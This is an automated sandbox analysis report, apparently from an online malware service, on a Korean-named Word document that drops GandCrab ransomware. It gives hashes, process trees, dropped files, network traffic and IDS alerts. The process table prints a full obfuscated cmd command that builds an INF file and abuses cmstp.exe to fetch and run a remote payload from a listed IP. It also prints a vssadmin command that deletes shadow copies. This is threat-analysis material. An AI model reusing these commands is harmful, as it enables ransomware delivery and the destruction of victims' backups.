File name: | 소환하다.doc |
Full analysis: | https://app.any.run/tasks/2bbb871d-0dc4-4f81-8405-ea589604e11c |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | March 22, 2019, 00:01:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Thu Mar 21 19:19:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
MD5: | 6D70903794AB3CA05DD1B1B4F917204F |
SHA1: | DBE96D823FB6C1B855020EA6676F27E9C13A0148 |
SHA256: | D383CEE6586F23BC1DCDD4D1E8638D58E795C0833111BCBD94AE1FB883AAE988 |
SSDEEP: | 3072:B6pgFP6P77AjBNJx4WDgDBiTBEIGMqFWrdn2TXz+rOieOnewQKJk2iwHagf:B6pO+AnJ2Wsi9EI4EdGKOseZ6z |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Admin |
Keywords: | - |
Comments: | - |
Template: | Normal |
LastModifiedBy: | Admin |
RevisionNumber: | 3 |
Software: | Microsoft Office Word |
TotalEditTime: | 2.0 minutes |
CreateDate: | 2019:02:28 14:52:00 |
ModifyDate: | 2019:03:21 19:19:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 23 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 26 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3488 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\소환하다.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3524 | cmd /V /C set "u05=s" && !u05!et "u39=\" && !u05!et "u42=e" && !u05!et "u43=i" && !u05!et "u49=A" && !u05!et "u1=N" && !u05!et "u5=d" && c!u49!ll !u05!et "u6=%!u49!PP!u5!!u49!T!u49!%" && c!u49!ll !u05!et "u63=%R!u49!!u1!!u5!OM%" && !u05!et "u62=!u6!!u39!M!u43!cro!u05!oft!u39!T!u42!mplat!u42!s!u39!!u63!.txt" && !u05!et "u8="^" && (For %i in ("[v!u42!r!u05!ion]" "!u05!ignatur!u42!=$Wi!u1!dow!u05! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!u42!faultIn!u05!tall_Singl!u42!U!u05!er]" "UnR!u42!gi!u05!t!u42!rOCXs=u66" "[u66]" "%11%\%u0_1%%u0_2%%u0_3%,NI,%u_1%%u_2%%u_3%%u_4%%u_5%%u_6%%u_7%%u_8%%u_9%%u_10%%u_11%%u_12%%u_13%%u_14%" "[!u05!tring!u05!]" "u_1=ht" "u_2=tp" "u_3=:/" "u_4=/1" "u_5=34" "u_6=.2" "u_7=09" "u_8=.8" "u_9=8." "u_10=23" "u_11=/s" "u_12=ub" "u_13=.t" "u_14=xt" "u0_2=rO" "u0_1=sC" "u0_3=bJ" ) do @echo %~i)>"!u62!" && echo !u05!erv!u43!ceNam!u42!=!u8! !u8!>>!u62! && echo !u05!hortSvcN!u49!me=!u8! !u8!>>!u62! && c!u49!ll !u05!et "u25=%WI!u1!!u5!IR%" && !u05!t!u49!rt "" !u25!!u39!Sy!u05!t!u42!m32!u39!cm!u05!tp.!u42!x!u42! /s /ns "!u62!" | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2228 | C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\13960.txt" | C:\Windows\System32\cmstp.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile Installer Exit code: 0 Version: 7.02.7600.16385 (win7_rtm.090713-1255) | ||||
3240 | "C:\Users\admin\AppData\Roaming\Microsoft\19345.exe" | C:\Users\admin\AppData\Roaming\Microsoft\19345.exe | cmstp.exe | |
User: admin Integrity Level: MEDIUM | ||||
2924 | "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet | C:\Windows\system32\cmd.exe | 19345.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
300 | vssadmin delete shadows /all /quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3148 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3488 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7F1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3488 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF406E7AD2AF734531.TMP | — | |
MD5:— | SHA256:— | |||
3488 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:208C373039D86BE9D5EDA2C6022D6916 | SHA256:730BB029E8DDE924CD8C1B06DC358641A5EB46FE87E03F28E514C48C9B59199F | |||
3488 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\SystemMonitor.exd | tlb | |
MD5:394CB8C4935620827B8A8612B48C57DC | SHA256:AFE711AB6B21DA0E3FFAA31B0E334097A33928503646B7B7F0AF22D888166A7B | |||
3240 | 19345.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | |
MD5:— | SHA256:— | |||
3240 | 19345.exe | C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-500\ILWYPLYE-MANUAL.txt | text | |
MD5:CBBC7540CD15FCDE4C43A5E58AC3DB49 | SHA256:ADD9730613D58D14739A933A6CAC1C9DD743C9A0C4CB9AE37FE71939E21230E1 | |||
3488 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8C087D74-0325-4E90-B020-56F93DB76053}.tmp | binary | |
MD5:DC38ED319823A1E8728BE0D3903A6B31 | SHA256:5BAC3C831A5FFE3881CE6F31A7B013C87335B781FB69E5EDA46BE3C49CBE0348 | |||
3240 | 19345.exe | C:\PerfLogs\Admin\ILWYPLYE-MANUAL.txt | text | |
MD5:CBBC7540CD15FCDE4C43A5E58AC3DB49 | SHA256:ADD9730613D58D14739A933A6CAC1C9DD743C9A0C4CB9AE37FE71939E21230E1 | |||
3240 | 19345.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim | — | |
MD5:— | SHA256:— | |||
3240 | 19345.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.ilwyplye | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2228 | cmstp.exe | GET | 200 | 134.209.88.23:80 | http://134.209.88.23/sub.txt | US | xml | 259 Kb | malicious |
3240 | 19345.exe | GET | 301 | 107.173.49.208:80 | http://www.kakaocorp.link/ | US | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3240 | 19345.exe | 107.173.49.208:80 | www.kakaocorp.link | ColoCrossing | US | malicious |
2228 | cmstp.exe | 134.209.88.23:80 | — | — | US | malicious |
3240 | 19345.exe | 107.173.49.208:443 | www.kakaocorp.link | ColoCrossing | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.kakaocorp.link |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2228 | cmstp.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet |
3240 | 19345.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
3240 | 19345.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
3240 | 19345.exe | A Network Trojan was detected | MALWARE [PTsecurity] GandCrab v.5 SSL Connection |